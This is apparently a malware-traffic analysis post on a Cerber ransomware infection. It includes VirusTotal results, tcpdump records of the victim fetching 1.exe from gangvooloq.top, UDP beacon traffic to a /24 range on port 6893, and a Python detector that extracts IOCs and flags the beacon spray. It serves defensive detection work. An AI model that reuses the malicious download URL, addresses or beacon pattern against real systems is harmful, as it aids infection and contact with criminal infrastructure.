RANSOMWARE CERBER gangvooloq.top GET /admin.php?f=1.exe Malware Traffic PCAP File Download 94.23.175 UDP/6893

 

VirusTotal results for the downloaded payload:

SHA256:          0f24c298bf3be1e2ef6c56763e4fadc22270a90df18ceb78024bb82a49b0bd41
File name:       1.exe
Detection ratio: 16 / 59
Analysis date:   2017-05-09 01:04:23 UTC

Engine                                  Result                                          Update
AegisLab                                Ml.Attribute.Gen!c                              20170508
Avast                                   Win32:Malware-gen                               20170509
Baidu                                   Win32.Trojan.WisdomEyes.16070401.9500.9999      20170503
CrowdStrike Falcon (ML)                 malicious_confidence_100% (W)                   20170130
Cyren                                   W32/Cerber.F.gen!Eldorado                       20170509
Endgame                                 malicious (high confidence)                     20170503
F-Prot                                  W32/Cerber.F.gen!Eldorado                       20170508
Invincea                                trojanspy.win32.ursnif.hn                       20170413
Kaspersky                               UDS:DangerousObject.Multi.Generic               20170508
McAfee                                  Trojan-FKQC!F33AD873ED2E                        20170508
McAfee-GW-Edition                       BehavesLike.Win32.Generic.hm                    20170508
Palo Alto Networks (Known Signatures)   generic.ml                                      20170509
SentinelOne (Static ML)                 static engine - malicious                       20170330
Symantec                                Trojan.Gen.8!cloud                              20170508
Webroot                                 W32.Trojan.Gen                                  20170509
ZoneAlarm by Check Point                UDS:DangerousObject.Multi.Generic               20170509

Payload download: the infected host 192.168.1.102 requests 1.exe from gangvooloq.top, which resolves to 47.91.76.69 in this capture, using an Internet Explorer 8 / Windows 7 User-Agent (the tcpdump -A ASCII rendering of the IP/TCP header bytes, which is not printable, is omitted):

2017-05-08 19:58:00.607221 IP 192.168.1.102.54567 > 47.91.76.69.80: Flags [P.], seq 0:405, ack 1, win 256, length 405: HTTP: GET /admin.php?f=1.exe HTTP/1.1
GET /admin.php?f=1.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gangvooloq.top
Connection: Keep-Alive

Post-infection UDP beacons: about 24 seconds after the download, the same host sends 13 packets within roughly 1 ms, all from source port 56465, to the consecutive addresses 94.23.175.35 through 94.23.175.47 on UDP/6893. Every packet carries the same 14-byte body, 72aabb4d96c2bf (the garbled ASCII column for the IP/UDP header bytes is omitted; only the printable body is shown once below). This matches Cerber's documented post-infection statistics beacon, which is sprayed at whole /24 ranges rather than a single C2 host; the excerpt here shows only the first 13 destinations, so the range most likely continues beyond .47.

2017-05-08 19:58:24.046363 IP 192.168.1.102.56465 > 94.23.175.35.6893: UDP, length 14
2017-05-08 19:58:24.046474 IP 192.168.1.102.56465 > 94.23.175.36.6893: UDP, length 14
2017-05-08 19:58:24.046673 IP 192.168.1.102.56465 > 94.23.175.37.6893: UDP, length 14
2017-05-08 19:58:24.046755 IP 192.168.1.102.56465 > 94.23.175.38.6893: UDP, length 14
2017-05-08 19:58:24.046867 IP 192.168.1.102.56465 > 94.23.175.39.6893: UDP, length 14
2017-05-08 19:58:24.046948 IP 192.168.1.102.56465 > 94.23.175.40.6893: UDP, length 14
2017-05-08 19:58:24.047079 IP 192.168.1.102.56465 > 94.23.175.41.6893: UDP, length 14
2017-05-08 19:58:24.047150 IP 192.168.1.102.56465 > 94.23.175.42.6893: UDP, length 14
2017-05-08 19:58:24.047262 IP 192.168.1.102.56465 > 94.23.175.43.6893: UDP, length 14
2017-05-08 19:58:24.047339 IP 192.168.1.102.56465 > 94.23.175.44.6893: UDP, length 14
2017-05-08 19:58:24.047454 IP 192.168.1.102.56465 > 94.23.175.45.6893: UDP, length 14
2017-05-08 19:58:24.047530 IP 192.168.1.102.56465 > 94.23.175.46.6893: UDP, length 14
2017-05-08 19:58:24.047639 IP 192.168.1.102.56465 > 94.23.175.47.6893: UDP, length 14
UDP body (identical in every packet): 72aabb4d96c2bf
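The two behaviours in this capture, the HTTP fetch of 1.exe and the UDP spray of one short body to consecutive hosts on port 6893, are what a detection engineer wants to pull out of tcpdump output automatically rather than by eye. The following Python is an added example and not code from the original post or from any tool it mentions. It parses tcpdump -tttt/-A style output, extracts block-list IOCs (download IP and URI, beacon port and body), and flags the UDP spray pattern: one source, one source port, one payload, many hosts in the same /24 within a short window. The sample input is constructed from the values in this post (the unprintable IP/UDP header bytes are replaced by dots, as tcpdump would show them); the thresholds min_hosts and window_ms are assumptions and should be tuned to the network being monitored.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Constructed input modelled on the capture in this post (not the raw dump).
# Each UDP summary line is followed by the ASCII line tcpdump -A prints:
# 28 bytes of IP/UDP header rendered as '.' and then the 14-byte body.
_HDR = "E..*" + "." * 24
SAMPLE = "\n".join(
    ["2017-05-08 19:58:00.607221 IP 192.168.1.102.54567 > 47.91.76.69.80: "
     "Flags [P.], seq 0:405, ack 1, win 256, length 405: "
     "HTTP: GET /admin.php?f=1.exe HTTP/1.1"]
    + [line
       for i, last in enumerate(range(35, 48))
       for line in (
           f"2017-05-08 19:58:24.{46363 + i * 100:06d} IP 192.168.1.102.56465 > "
           f"94.23.175.{last}.6893: UDP, length 14",
           _HDR + "72aabb4d96c2bf")]
) + "\n"

_PKT = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{6}) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): (?P<rest>.*)$")
_UDP = re.compile(r"^UDP, length (?P<len>\d+)$")
_HTTP = re.compile(r"HTTP: (?P<req>[A-Z]+ \S+ HTTP/\d\.\d)")


def parse_tcpdump(text):
    """Parse tcpdump summary lines into dicts. For UDP packets the body is the
    last `length` characters of the ASCII line that follows the summary."""
    lines = text.splitlines()
    packets, i = [], 0
    while i < len(lines):
        m = _PKT.match(lines[i])
        i += 1
        if not m:
            continue
        pkt = {"ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f"),
               "src": m.group("src"), "sport": int(m.group("sport")),
               "dst": m.group("dst"), "dport": int(m.group("dport"))}
        u = _UDP.match(m.group("rest"))
        if u:
            n = int(u.group("len"))
            pkt["proto"], pkt["payload"] = "udp", ""
            if n and i < len(lines) and not _PKT.match(lines[i]):
                pkt["payload"] = lines[i][-n:]   # header bytes precede the body
                i += 1
        else:
            pkt["proto"] = "tcp"
            h = _HTTP.search(m.group("rest"))
            pkt["http"] = h.group("req") if h else None
        packets.append(pkt)
    return packets


def extract_iocs(packets):
    """Network IOCs worth blocking or hunting: download server + URI for HTTP
    requests, destination port + body for UDP beacons."""
    iocs = set()
    for p in packets:
        if p["proto"] == "tcp" and p.get("http"):
            iocs.add(("http", p["dst"], p["dport"], p["http"].split()[1]))
        elif p["proto"] == "udp":
            iocs.add(("udp", p["dport"], p["payload"]))
    return sorted(iocs)


def detect_udp_spray(packets, min_hosts=8, window_ms=1000):
    """Flag one source sending one UDP body from one source port to at least
    min_hosts distinct hosts in a single /24 within window_ms. Thresholds are
    assumed values for illustration, not published detection tuning."""
    groups = defaultdict(list)
    for p in packets:
        if p["proto"] == "udp":
            groups[(p["src"], p["sport"], p["dport"], p["payload"])].append(p)
    findings = []
    for (src, sport, dport, body), pkts in groups.items():
        nets = {ipaddress.ip_network(p["dst"] + "/24", strict=False) for p in pkts}
        hosts = {p["dst"] for p in pkts}
        times = [p["ts"] for p in pkts]
        span_ms = (max(times) - min(times)).total_seconds() * 1000
        if len(nets) == 1 and len(hosts) >= min_hosts and span_ms <= window_ms:
            findings.append({"src": src, "sport": sport, "dport": dport,
                             "payload": body, "network": str(nets.pop()),
                             "hosts": len(hosts), "span_ms": round(span_ms, 3)})
    return findings


if __name__ == "__main__":
    pkts = parse_tcpdump(SAMPLE)
    for ioc in extract_iocs(pkts):
        print(ioc)
    for finding in detect_udp_spray(pkts):
        print(finding)
```

Feed it `tcpdump -tttt -nn -A -r capture.pcap` output instead of SAMPLE to run it against a real file; the grouping key deliberately includes the source port, because a legitimate scanner or DNS resolver varies its source port while this beacon reuses 56465 for every destination.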